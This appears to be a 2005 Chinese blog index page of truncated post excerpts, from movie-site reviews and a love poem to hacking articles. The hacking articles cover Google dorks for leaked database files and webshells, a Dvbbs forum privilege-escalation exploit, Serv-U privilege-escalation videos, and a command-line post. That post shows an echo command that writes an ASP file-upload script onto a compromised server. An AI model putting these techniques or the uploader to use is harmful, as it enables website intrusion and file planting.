免费电影集中营

2005/07/13 4:02 | 鬼仔 | 影音娱乐 | 5 条评论了已经

=====前言=====


该内容中的免费电影网站均搜自互联网,有许多网站尚未发现,但本人将逐步更新和完善新免费电影站,在此申明一点,所有电影站均为本人亲自过目,目前未发现其中任何网站含恶意代码或病毒,但为了安全起见,请点击网址前先做好必要的准备。并且,所以免费电影站的评价均为个人意见,因地理位置不同、上网速度不同,评价仅作为参考所用。对以下电影站有何意见或评价的均在此跟帖。谢谢!

NO.1 百看免费电影
评价:
速度相当稳定,无弹出广告,也无需注册,缺点在于电影更新较慢,内容也比较少,但作为免费电影站来说相当不错的了。
推荐度:★★★★
阅读全文 »

鱼和水的对白<暗恋版>

2005/07/12 9:16 | 鬼仔 | 乱七八糟 | 消灭0留言

鱼对水说:你看不见我的眼泪,因为我在水中。
水对鱼说:我能感觉到你的眼泪,因为你在我心中。
我不是鱼,你也不是水。你能看见我寂寞的眼泪吗?

鱼对水说:我永远不会离开你,因为离开你,我无法生存。
水对鱼说:我知道,可是如果你的心不在呢?
我不是鱼,你也不是水。我不离开你是因为我爱你。
可是,你的心里有我吗?

鱼对水说:我很寂寞,因为我只能待在水中。
水对鱼说:我知道,因为我的心里装着你的寂寞。
我不是鱼,你也不是水。我寂寞是因为我思念你。
可是,远方的你能感受到吗?

鱼对水说:如果没有鱼,那水里还会剩下什么?
水对鱼说:如果没有你又怎么会有我?
我不是鱼,你也不是水。没有你的爱我依然会好好的活。
可是,好好的活并不代表我可以把你忘记。

鱼对水说:一辈子不能出去看看外面的世界,是我最大的遗憾。
水对鱼说:一辈子不能打消你的这个念头,是我最大的失败。
我不是鱼,你也不是水。现在我只想要一个一辈子的承诺。
阅读全文 »

Google hack第二版下载

2005/07/11 4:39 | 鬼仔 | 技术文章 | 才 1 条评论

来源: 冰点极限&海阳顶端论坛

首先要说明的是"什么是Google hack?"

前言
googlehacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉googlehacking其实并非如此简单…

googlehacking的简单实现

记得以前看见过一篇文章写的就是简单的通过用www.google.com来搜索dvbbs6.mdb或conn.inc来获得一些站点的敏感信息.其实使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法.
intext:
这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在goo 阅读全文 »

Do All in Cmd Shell (一切尽在命令行)

2005/07/10 5:22 | 鬼仔 | 技术文章 | 才 1 条评论

update(2007.5.16):关于up.asp上传文件出现问题的解决方法,来自安全焦点论坛int21
https://www.xfocus.net/bbs/index.php?act=ST&f=15&t=47505
出现这种问题的原因是IUSR_XXX 用户默认情况下对有些目录(包括c:\inetpub\wwwroot)不可写,就算把IIS主目录选上”写入”属性也是一样的.一般C:\是可写的,现在把UP.ASP改一下就可以用了.

@echo ^<%with server.createobject("adodb.stream"):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile  阅读全文 »
Tags: ,

对河南网通无奈了.

2005/07/05 9:04 | 鬼仔 | 心情随笔 | 消灭0留言

昨天晚上7点多的时候,正跟QQ上跟一个很早以前就知道,但是没有认识的朋友聊天..
就突然掉线,然后就怎么也连不上.我打电话给我老家的朋友,他们也都连不上了.
接着就打电话给网通的人,他们跟我说全河南省网通都上不了网,原因是郑州那里出了问题,具体是什么问题他也不说.
我问他大概多长时间能恢复,他也不说..
等到9点多的时候,我再试试,还是连不上.

无奈,看了会儿电视就去睡觉了.
刚起床,连上线了..

动网7.0 SP2漏洞(动网论坛权限提升漏洞)利用程序[已更新]

2005/07/03 8:34 | 鬼仔 | 工具收集 | 消灭0留言

昨天公布的那个动网论坛权限提升漏洞的利用程序
其实昨天就已经拿到一个利用程序了,但是看起来没这个漂亮,就把这个放上来了.

来源:XpFox’s Blog
阅读全文 »

动网论坛权限提升漏洞

2005/07/02 8:17 | 鬼仔 | 技术文章 | 消灭0留言

文章作者:focn & jinsdb
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

在6月份的黑防上看到《动网7.1漏洞惊现江湖》一文,说是admin_postings.asp文件

存在注入漏洞,但利用的前提是拥有超级斑竹或前台管理员权限。我想起以前发现的动网7.x版本存在一个前台权限提升漏洞,
正好可以结合起来利用。这个前台权限提升漏洞对7.x的Access和 Sql版都有效。下面我们就以7.0 sp2 sql版,讲解这个漏洞的利用。

漏洞分析
我们知道动网是通过GroupID来判断当前用户所在的组的,然后再通过组的信息判断用户的权限。它是如何取得这个GroupID的呢?让我们看看登录验证的那一段:

login.asp的525行左右

Rem ==========论坛登录函数=========

Rem 判断用户登录

阅读全文 »

黑客动画总结(三)

2005/07/02 3:07 | 鬼仔 | 技术文章 | 消灭0留言

作者:阿汀qq86494359 来源:www.hack6.com

2005年6月21日到30日黑客动画总结

这几天忙着毕业答辩了,总结写的比较匆忙.
很多服务器都是被serv-u提权了,看看我做的serv-u配置动画,华夏黑客同盟下载
http://www.77169.org/donghua/Class64/200505/19703.html
要你觉得你提权技术不行的话,请先看看我以前做的动画, 总结的很全的
(有语音)击溃服务器bt权限总结+工具
http://www.hack58.com/Software/catalog2/477.html
(有语音)简单突破权限设置漏洞挂马
http://www.hack58.com/Software/catalog6/456.html
下面继续总结这十天的动画
86.搜索inurl:MirCMS_News, 阅读全文 »